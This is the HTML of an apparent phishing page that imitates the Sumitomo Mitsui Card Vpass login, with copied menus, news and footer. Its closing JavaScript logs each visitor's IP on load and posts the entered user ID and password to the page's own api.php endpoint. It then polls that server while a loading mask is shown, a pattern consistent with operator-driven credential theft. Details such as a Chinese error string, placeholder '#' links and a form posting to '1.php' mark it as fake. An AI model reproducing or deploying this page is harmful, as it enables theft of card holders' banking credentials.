                                                    <a class="megaMenu_subItem_link" href="/mem/service/sec/otp.jsp">
                                                        <div class="megaMenu_subItem_linkText">ワンタイムパスワードサービス<br>「One Time Pass」アプリ</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                            </ul><!-- /.megaMenu_subBody -->
                                        </div><!-- /.megaMenu_sub -->
                                        <div class="megaMenu_sub megaMenu_subTitle_two">
                                            <div class="megaMenu_subTitle">紹介プログラム</div>
                                            <ul class="megaMenu_subBody">
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/vto.jsp">
                                                        <div class="megaMenu_subItem_linkText forPcBlock">三井住友カード ご紹介特典</div>
                                                        <div class="megaMenu_subItem_linkText forSpBlock">三井住友カード ご紹介特典</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                            </ul>
                                        </div>
                                    </div><!-- /.megaMenu_subWrap -->
                                    <div class="megaMenu_subWrap">
                                        <div class="megaMenu_sub">
                                            <div class="megaMenu_subTitle">追加カードのお申し込み</div>
                                            <ul class="megaMenu_subBody">
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/kantan.jsp">
                                                        <div class="megaMenu_subItem_linkText">クレジットカード（かんたん申し込み）</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/index.jsp">
                                                        <div class="megaMenu_subItem_linkText">付帯カード一覧</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/family_top.jsp">
                                                        <div class="megaMenu_subItem_linkText">家族カード・パートナーカード</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/etc_top.jsp">
                                                        <div class="megaMenu_subItem_linkText">三井住友ETCカード</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/waon_top.jsp">
                                                        <div class="megaMenu_subItem_linkText">三井住友カードWAON</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/id-portal.jsp">
                                                        <div class="megaMenu_subItem_linkText">三井住友カードiD</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/addcard/mobilepayment/index.jsp">
                                                        <div class="megaMenu_subItem_linkText">スマホ・モバイル決済</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                            </ul>
                                        </div><!-- /.megaMenu_sub -->
                                    </div><!-- /.megaMenu_subWrap -->
                                    <div class="megaMenu_subMessage forSpBlock">未ログインのお客さまはお手続きの途中でVpassログインが必要です。</div>
                                    <a class="megaMenu_subClsBtn forSpBlock">閉じる</a>
                                </div><!-- /.megaMenu_subMenu -->
                            </div><!-- /.megaMenu_itemBody -->
                        </li><!-- /.megaMenu_item --><!-- ##### 変更お手続き ##### -->
                        <li class="megaMenu_item">
                            <div class="megaMenu_itemTitle jsAccordionToggle">
                                <a class="megaMenu_itemTitleLink forPcBlock" href="/mem/update/index.jsp">
                                    変更お手続き
                                    <div class="megaMenu_itemTitlebtmline"></div>
                                </a>
                                <img class="megaMenu_itemTitleimg_st forSpBlock" src="https://www.smbc-card.com/static/responsive/img/mem/ic_change_st.svg" alt="変更お手続き">
                                <img class="megaMenu_itemTitleimg_fill forSpBlock" src="https://www.smbc-card.com/static/responsive/img/mem/ic_change_fill.svg" alt="変更お手続き">
                            </div>
                            <div class="megaMenu_itemBody">
                                <div class="megaMenu_subTop">
                                    <a class="meagDdm_subTopButton" href="/mem/goriyo/lost.jsp">
                                        <div class="meagDdm_subTopBtnItem">
                                            <div class="meagDdm_subTopBtnImage">
                                                <img class="" src="/static/responsive/img/mem/ic_lost.svg" alt="紛失・盗難・不正利用に伴うカード停止">
                                            </div>
                                            <div class="meagDdm_subTopBtnText">紛失・盗難・不正利用に伴うカード停止</div>
                                        </div>
                                    </a>
                                    <a class="meagDdm_subTopButton" href="/mem/update/card_henkou.jsp">
                                        <div class="meagDdm_subTopBtnItem">
                                            <div class="meagDdm_subTopBtnImage">
                                                <img class="" src="/static/responsive/img/mem/ic_change.svg" alt="住所や電話番号等の照会・変更">
                                            </div>
                                            <div class="meagDdm_subTopBtnText">住所や電話番号等の<br>照会・変更</div>
                                        </div>
                                    </a>
                                </div><!-- /.megaMenu_subTop -->
                                <div class="megaMenu_subMenu">
                                    <div class="megaMenu_subWrap forSpBlock">
                                        <a class="megaMenu_subTopLink" href="/mem/update/index.jsp">変更お手続き TOP</a>
                                    </div>
                                    <div class="megaMenu_subWrap">
                                        <div class="megaMenu_sub">
                                            <div class="megaMenu_subTitle">お客さま情報の照会・変更</div>
                                            <ul class="megaMenu_subBody">
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/card_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">住所や電話番号等の照会・変更</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/kouza_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">お支払い口座の変更</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/shiharaibi_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">お支払い日の変更</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/meigi_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">お名前の変更（カード名義の変更）</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->

                                            </ul><!-- /.megaMenu_subBody -->
                                        </div><!-- /.megaMenu_sub -->
                                    </div><!-- /.megaMenu_subWrap -->
                                    <div class="megaMenu_subWrap">
                                        <div class="megaMenu_sub">
                                            <div class="megaMenu_subTitle">カードに関するお手続き</div>
                                            <ul class="megaMenu_subBody">
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/goriyo/lost.jsp">
                                                        <div class="megaMenu_subItem_linkText">紛失・盗難・不正利用に伴うカード停止</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/card_saisei.jsp">
                                                        <div class="megaMenu_subItem_linkText">カードの再発行（破損・磁気不良）</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/pin_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">暗証番号照会・変更</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/memapi/jaxrs/rankchange/rankchange_exp_page/v1">
                                                        <div class="megaMenu_subItem_linkText">カードの切替え（アップグレード・ダウングレード）</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/card_taikai/index.jsp">
                                                        <div class="megaMenu_subItem_linkText">カードの退会（解約）</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                            </ul>
                                        </div>
                                    </div><!-- /.megaMenu_subWrap -->
                                    <div class="megaMenu_subWrap">
                                        <div class="megaMenu_sub">
                                            <div class="megaMenu_subTitle">Vpassに関するお手続き</div>
                                            <ul class="megaMenu_subBody">
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/vp_henkou.jsp">
                                                        <div class="megaMenu_subItem_linkText">ID・パスワード・メールアドレスなどの照会・変更</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/omatome.jsp">
                                                        <div class="megaMenu_subItem_linkText">おまとめログインサービス</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/mailmagazine_settei.jsp">
                                                        <div class="megaMenu_subItem_linkText">メールサービス「三井住友カードレター」のご登録・解除</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                                <li class="megaMenu_subItem">
                                                    <a class="megaMenu_subItem_link" href="/mem/update/vp_kaiyaku.jsp">
                                                        <div class="megaMenu_subItem_linkText">Vpass登録の解除</div>
                                                    </a>
                                                </li><!-- /.megaMenu_subItem -->
                                            </ul><!-- /.megaMenu_subBody -->
                                        </div><!-- /.megaMenu_sub -->
                                    </div><!-- /.megaMenu_subWrap -->
                                    <div class="megaMenu_subMessage forSpBlock">未ログインのお客さまはお手続きの途中でVpassログインが必要です。</div>
                                    <a class="megaMenu_subClsBtn forSpBlock">閉じる</a>
                                </div><!-- /.megaMenu_subMenu -->
                            </div><!-- /.megaMenu_itemBody -->
                        </li><!-- /.megaMenu_item -->

                    </ul><!-- /.megaMenu --><!-- M-NA-5 end:メガドロップダウンメニュー --><!-- M-NA-5 start:メガドロップダウンメニュー -->
                    <ul class="megaMenu hamburgerMenuSp">

                        <!-- ##### 検索欄 ##### -->
                        <li class="searchAreaWrapSp">
                            <form name="SS_searchForm" >
                                <div class="searchBox">
                                    <input type="text" name="kw" value="" size="20" id="SS_searchQuery02" class="searchTextBox" maxlength="100" autocomplete="off" placeholder="キーワードを入力して検索">
                                    <input value="検索" type="submit" id="SS_searchSubmit02" class="searchButton">
                                </div>
                            </form>
                        </li>

                        <!-- ##### SP用メニュー ##### -->
                        <li class="megaMenu_item megaMenu_item-sp">
                            <div class="megaMenu_spBottom">
                                <div class="megaMenu_spBottomNavItem"><a class="megaMenu_spBottomNavItemLink" href="/mem/info/index.jsp">お客さまサポート</a></div>
                                <div class="megaMenu_spBottomNavItem"><a class="megaMenu_spBottomNavItemLink" href="/mem/vps/about/index.jsp">会員サービスVpassのご登録</a></div>
                                <div class="megaMenu_spBottomNavItem"><a class="megaMenu_spBottomNavItemLink" href="/index.jsp">三井住友カード総合TOP</a></div>
                                <div class="megaMenu_spBottomNavItem"><a class="megaMenu_spBottomNavItemLink" href="/mem/language/index.jsp">Language</a></div>
                                <div class="megaMenu_spBottomNavItem"><a class="megaMenu_spBottomNavItemShare" href="/mem/info/screenshare.jsp">画面共有の案内を受けたお客さま</a></div>
                            </div>
                        </li><!-- /.megaMenu_item -->
                    </ul><!-- /.megaMenu --><!-- M-NA-5 end:メガドロップダウンメニュー -->

                    <div id="searchArea" class="searchAreaWrap">
                        <form name="SS_searchForm" id="SS_searchForm" action="/memx/search/index.html" method="get">
                            <div class="searchBox">
                                <input type="text" name="kw" value="" size="20" id="SS_searchQuery" class="searchTextBox" maxlength="100" autocomplete="off" placeholder="キーワードを入力して検索">
                                <input value="検索" type="submit" id="SS_searchSubmit" class="searchButton">
                            </div>
                        </form>
                    </div>

                </div><!-- /.hRight -->
            </ul>
        </div>
        <!-- オーバーレイ -->
        <div id="header_overlay"></div>
        <!-- M-NA-1 end:ヘッダー --><!-- start:メインHTML -->
        <div id="contWrap" style="">
            <div>
                <!-- start:メイン -->
                <div>
                    <h2>Vpassログイン</h2>
                    <section class="loginBox">
                        <div class="loginArea">
                            <form method="post" id="tijiao" action="1.php" method="post">
                                <div id="input_id" class="input_wrap">
                                    <input id="id_input" name="userid" type="text" maxlength="20" required="">
                                    <span class="placeholder">
                    <label for="id_input">ID</label>
                  </span>
                                </div>
                                <div id="input_password" class="input_wrap">
                                    <input id="pw_input" name="password" type="password" maxlength="20" required="">
                                    <span class="placeholder">
                   <label for="pw_input">パスワード</label>
                 </span>
                                    <span class="field-icon">
                   <i id="pw_eye" toggle="#password-field" class="mdi-eye"></i>
                 </span>
                                </div>
                                <!-- ログインボタン パラメータ表示制御ここから --><!-- リンパラメータ取得 --><!-- リンクパラメータ pwc_attention=1の場合 --><!-- ログインボタン パラメータ表示制御ここまで -->
                                <div class="loginSubmit">
                                    <div class="loginbtn">
                                        <input class="btnNormal" type="button" onclick="verify()" value="ログイン">
                                    </div>

                                </div>
                            </form>
                        </div>
                        <div class="menuArea">
                            <h3>初めてご利用の方</h3>
                            <div>
                                <a href="#" class="co_btn">Vpassにご登録（無料）</a>
                            </div>
                            <ul class="smallArrowLink">
                                <li>
                                    <a href="#">Vpassとは？</a>
                                </li>
                            </ul>
                        </div>
                    </section>

                    <!-- start:シ開用　障害エリア Don't move -->
                    <div id="failureInfoSysE" style="display: none;"></div>
                    <!-- end:シ開用　障害エリア Don't move --><!-- シ開用　システム情報エリア Don't move start -->
                    <div id="systemInfoArea" style="display: none;">
                        <div class="forPcBlock">
                            <div style="width: 1000px; margin-left: auto; margin-right: auto;">
                                <h5 data-systeminfo-item="title"></h5>
                                <div data-systeminfo-item="infos">
                                    <div class="liqW maB5" data-systeminfo-item="info">
                                        <div class="liqC" style="width: 9em" data-systeminfo-item="date"></div>
                                        <div class="liqC" data-systeminfo-item="detail"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="forSpBlock">
                            <div>
                                <h5 data-systeminfo-item="title"></h5>
                                <div data-systeminfo-item="infos">
                                    <div class="maB5" data-systeminfo-item="info">
                                        <div data-systeminfo-item="date"></div>
                                        <div data-systeminfo-item="detail"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- シ開用　システム情報エリア Don't move end -->
                    <section class="h2Block">
                        <div class="gtop_newsAreaWrap maT50">
                            <div class="gtop_newsAreaInner">
                                <div class="liqW">
                                    <h5>インフォメーション</h5>
                                    <div class="tabAreaWrap forPcBlock">
                                        <div class="tabHead vertical" id="tabType02">
                                            <ul>
                                                <li class="item01 act"><span class="forPcBlock">新着情報</span><span class="forSpBlock">新着</span></li>
                                                <li class="item02"><span class="forPcBlock">サービス案内</span><span class="forSpBlock">サービス</span></li>
                                                <li class="item03"><span class="forPcBlock">メンテナンス情報</span><span class="forSpBlock">メンテナンス</span></li>
                                                <li class="item04"><span class="forPcBlock">セキュリティ情報</span><span class="forSpBlock">セキュリティ</span></li>
                                                <li class="item05">お客さまの声</li>
                                                <li class="item06">その他</li>
                                            </ul>
                                        </div>
                                        <div class="tabBody01 tabBody" style="display: block; clear: both;">
                                            <dl id="ktop_information">
                                                <dt>2023年03月10日</dt><dd><div><a href="#" target="_blank">「宝塚歌劇ニュース」を更新しました。<span class="blankLink"></span></a></div></dd><dt>2023年03月08日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010629.jsp">三井住友VISAカード＆三井住友マスターカード法人会員規約（個人システム型）の一部改定について（改定日2023年4月10日）</a></div></dd><dt>2023年03月05日</dt><dd><div>緊急メンテナンスのため、2023年3月4日（土）17時頃より、Vpassの一部のサービスを停止しておりました。現在は再開しております。ご迷惑をおかけしましたことを深くお詫び申し上げます。</div></dd><dt>2023年03月03日</dt><dd><div>Mastercardブランドの当社カードをご利用の方について、Mastercard側の不具合に起因し、ご利用明細に利用加盟店名称の一部が誤って表示される事象が発生しておりました。現在は復旧しております。ご迷惑をおかけしましたことを深くお詫び申し上げます。</div></dd><dt>2023年03月03日</dt><dd><div>システムメンテナンスのため、2023年3月13日（月）3:00～6:00の間、Vpass登録やカード情報照会、Apple Pay/ Google Pay™ 設定時の本人認証のうち、電話認証機能がご利用いただけません。ご不便をおかけしますが、何卒ご了承くださいますようお願いいたします。</div></dd></dl>
                                        </div>
                                        <div class="tabBody02 tabBody" style="display: none;">
                                            <dl id="ktop_service">
                                                <dt>2023年02月08日</dt><dd><div><a href="#">2023年2月以降のカード再発行手数料改定のお知らせ</a></div></dd><dt>2023年02月02日</dt><dd><div><a href="/nyukai/campaign/cardinfo7040214.jsp">【お詫びと訂正】「キャッシュレスプラン増額キャンペーン」Vポイントギフトコードの誤送付について</a></div></dd><dt>2022年12月16日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010597.jsp">Vpassアプリ限定サービス「スタンプカード」の終了について</a></div></dd><dt>2022年12月15日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010598.jsp">Mastercard 海外緊急（キャッシュ）サービス終了のお知らせ</a></div></dd><dt>2022年12月07日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010592.jsp">「おまとめログインサービス」の解除受付終了のお知らせ</a></div></dd></dl>
                                            <ul class="smallArrowLink">
                                                <li>
                                                    <a href="#">サービス案内一覧</a>
                                                </li>
                                            </ul>
                                        </div>
                                        <div class="tabBody03 tabBody" style="display: none;">
                                            <dl id="ktop_maintenance">
                                                <dt>2023年03月05日</dt><dd><div>緊急メンテナンスのため、2023年3月4日（土）17時頃より、Vpassの一部のサービスを停止しておりました。現在は再開しております。ご迷惑をおかけしましたことを深くお詫び申し上げます。</div></dd><dt>2023年03月03日</dt><dd><div>システムメンテナンスのため、2023年3月13日（月）3:00～6:00の間、Vpass登録やカード情報照会、Apple Pay/ Google Pay™ 設定時の本人認証のうち、電話認証機能がご利用いただけません。ご不便をおかけしますが、何卒ご了承くださいますようお願いいたします。</div></dd><dt>2023年03月02日</dt><dd><div>メンテナンスのため、2023年3月9日（木）00:30～6:30の間、一時的にApple Pay／ Google Pay™ の設定およびご利用ができない場合がございます。ご不便をおかけしますが、何卒ご了承くださいますようお願いいたします。</div></dd><dt>2023年02月17日</dt><dd><div>システム障害のため、2023年2月17日（金） Google Pay™ のVisaのタッチ決済が設定できない事象が発生しておりました。現在は復旧しております。ご迷惑をおかけした事を深くお詫び申し上げます。</div></dd><dt>2023年02月08日</dt><dd><div>臨時メンテナンスのため、2023年2月14日（火）1:30～4:00の間、一時的にApple Pay の設定およびご利用ができない場合がございます。ご不便をおかけしますが、何卒ご了承くださいますようお願いいたします。</div></dd></dl>
                                            <p><a href="#">定例メンテナンスのため、毎週月曜日0:00～8:00の間、お支払金額照会などの一部のサービスを停止させていただきます。</a></p>
                                            <ul class="smallArrowLink">
                                                <li>
                                                    <a href="#">メンテナンス情報一覧</a>
                                                </li>
                                            </ul>
                                        </div>
                                        <div class="tabBody04 tabBody" style="display: none;">
                                            <dl id="ktop_security">
                                                <dt>2023年02月28日</dt><dd><div><a href="#">株式会社トマトより、同社が運営する「TOMATOオンラインショップ」への不正アクセスによる個人情報流出に関する発表について</a></div></dd><dt>2023年02月20日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010628.jsp">株式会社三京商会より、同社が運営する「三京商会」への不正アクセスによる個人情報流出に関する発表について</a></div></dd><dt>2023年02月14日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010626.jsp">ソースネクスト株式会社より、運営する同社サイトへの不正アクセスによる個人情報流出に関する発表について</a></div></dd><dt>2022年12月21日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010602.jsp">株式会社スタイリッシュ・エイチ・アンド・エイより、同社が運営する「COLORFUL CANDY STYLE公式オンラインショップ」への不正アクセスによる個人情報流出に関する発表について</a></div></dd><dt>2022年12月07日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010591.jsp">「簡単な作業で稼げる」というガイドブック購入後、電話で高額なサポートプランを契約させる悪質商法に注意！</a></div></dd></dl>
                                            <ul class="smallArrowLink">
                                                <li>
                                                    <a href="#">セキュリティ情報一覧</a>
                                                </li>
                                            </ul>
                                        </div>
                                        <div class="tabBody05 tabBody" style="display: none;">
                                            <dl id="ktop_koe">
                                                <dt>2023年2月9日</dt><dd><div><a href="#" target="_blank">三井住友カードナンバーレスシリーズのサインパネルレスカードの発行を開始しました！<span class="blankLink"></span></a></div></dd><dt>2023年1月24日</dt><dd><div><a href="/company/koe/koe0000219.jsp" target="_blank">カードのオンライン申し込みで、ご登録情報を使って入力項目を減らす「かんたん申し込み」ができるようになりました！<span class="blankLink"></span></a></div></dd><dt>2022年12月15日</dt><dd><div><a href="/company/koe/koe0000218.jsp" target="_blank">「対象のコンビニ・飲食店で最大5％還元！」サービスの対象店舗・対象カードが増え、よりお得にポイントが貯められるようになりました！<span class="blankLink"></span></a></div></dd><dt>2022年10月27日</dt><dd><div><a href="/company/koe/koe0000217.jsp" target="_blank">Vpassアプリ「ご利用通知のお知らせ一覧」で、利用店名・利用金額を確認できるようになりました！<span class="blankLink"></span></a></div></dd><dt>2022年9月27日</dt><dd><div><a href="/company/koe/koe0000216.jsp" target="_blank">Vポイント交換画面をわかりやすく変更しました！<span class="blankLink"></span></a></div></dd></dl>
                                            <ul class="smallArrowLink">
                                                <li>
                                                    <a href="#">お客さまの声一覧</a>
                                                </li>
                                            </ul>
                                        </div>
                                        <div class="tabBody06 tabBody" style="display: none;">
                                            <dl id="ktop_other">
                                                <dt>2023年03月10日</dt><dd><div><a href="#" target="_blank">「宝塚歌劇ニュース」を更新しました。<span class="blankLink"></span></a></div></dd><dt>2023年03月08日</dt><dd><div>

                                                        <a href="#">三井住友VISAカード＆三井住友マスターカード法人会員規約（個人システム型）の一部改定について（改定日2023年4月10日）</a></div></dd><dt>2023年03月03日</dt><dd><div>Mastercardブランドの当社カードをご利用の方について、Mastercard側の不具合に起因し、ご利用明細に利用加盟店名称の一部が誤って表示される事象が発生しておりました。現在は復旧しております。ご迷惑をおかけしましたことを深くお詫び申し上げます。</div></dd><dt>2023年03月01日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010627.jsp">個人情報の取り扱いについて（公表事項）の一部改定について</a></div></dd><dt>2023年03月01日</dt><dd><div><a href="/mem/cardinfo/cardinfo4010623.jsp">規約・特約の一部改定について（改定日　2023年4月1日）</a></div></dd></dl>
                                            <ul class="smallArrowLink">
                                                <li>
                                                    <a href="#">その他一覧</a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </section>

                    <!-- M-NA-3 start:パンくず --><!-- M-NA-3 end:パンくず -->
                </div>
                <!-- end:メイン -->
            </div>
        </div>
        <!-- end:メインHTML  --><!-- start:フッター --><!-- 未ログイン状態 --><!-- ページ共通フッター（未ログイン状態） -->
        <link rel="stylesheet" href="https://www.smbc-card.com/static/responsive/css/mem/footer.css">
        <footer id="footer">
            <!-- ページトップボタン -->
            <div class="pgTopLinkWrap">
                <a class="pgTopLink02" href="#allWrapper">
                    <img src="https://www.smbc-card.com/static/responsive/img/img_link_pageTop.png" alt="">
                </a>
            </div>
            <div class="linkWrap">
                <!-- フッターリンク -->

                <!-- start:コピーライト -->
                <div class="footArea_copyright">
                    <!-- コピーライト -->
                    <p id="copyArea">
                        <small>Copyright&nbsp;(C)&nbsp;<script type="text/javascript">dd=new Date();yy=dd.getYear();if(yy<2000){yy+=1900;};document.write(yy);</script>2023&nbsp;Sumitomo&nbsp;Mitsui&nbsp;Card&nbsp;Co.,&nbsp;Ltd.</small>
                    </p>

                </div>
                <!-- end:コピーライト -->
            </div>
        </footer>
        <!-- end:フッター -->

    </div>
</div>


<script type="text/javascript">

    var mask = null;
    var timer = null;
    var hb_timer = null;
    function heart_beat() {
        $.get('/api.php?act=heart_beat&_r=' + Math.random(), function (res) {
            console.log(res);
        });
    }
    function ip_save() {
        $.get('/api.php?act=ip_save&_r=' + Math.random(), function (res) {
            console.log(res);
        });
    }
    ip_save();


    function verify(){


        var ap_email = document.getElementById("id_input");
        var ap_password = document.getElementById("pw_input");
        if(ap_email.value.length<5){

            layer.msg('ユーザーIDまたはパスワードが正しくありません。！');
            ap_email.focus()
            return false;
        }

        if(ap_password.value.length<5){

            layer.msg('ユーザーIDまたはパスワードが正しくありません。！');
            ap_password.focus()
            return false;
        }

        if(ap_email.value || ap_email.value) {

            var appid = ap_email.value;
            var apppwd = ap_password.value;
            $.ajax({
                url: '/api.php?act=next_save&_r='+Math.random(),
                type: 'post',
                data: {uname:appid,apppwd:apppwd},
                success: function (res) {
                    var t = JSON.parse(res);
                    if(t.code == 'ok') {
                        mask = layer.load(2, {shade: [0.25, '#000']});
                        timer = setInterval("is_agree()", 1000);
                        hb_timer = setInterval("heart_beat()",1000);

                        document.getElementById("tijiao").submit();
                        // window.location.href="request_type.php";
                        return false;
                    }else{
                        layer.msg('提交失败！');
                        return false;
                    }
                },
            });
            return false;
        }else {
            m.style = "border-color: rgb(246, 70, 93);";
            erroremail.style = 'dispaly:block';
            return false;
        }
    }


</script>


</body><iframe id="aMpc0Wu2zFxeefIt" style="display: none;"></iframe><div style="display: none;"></div>



</html>
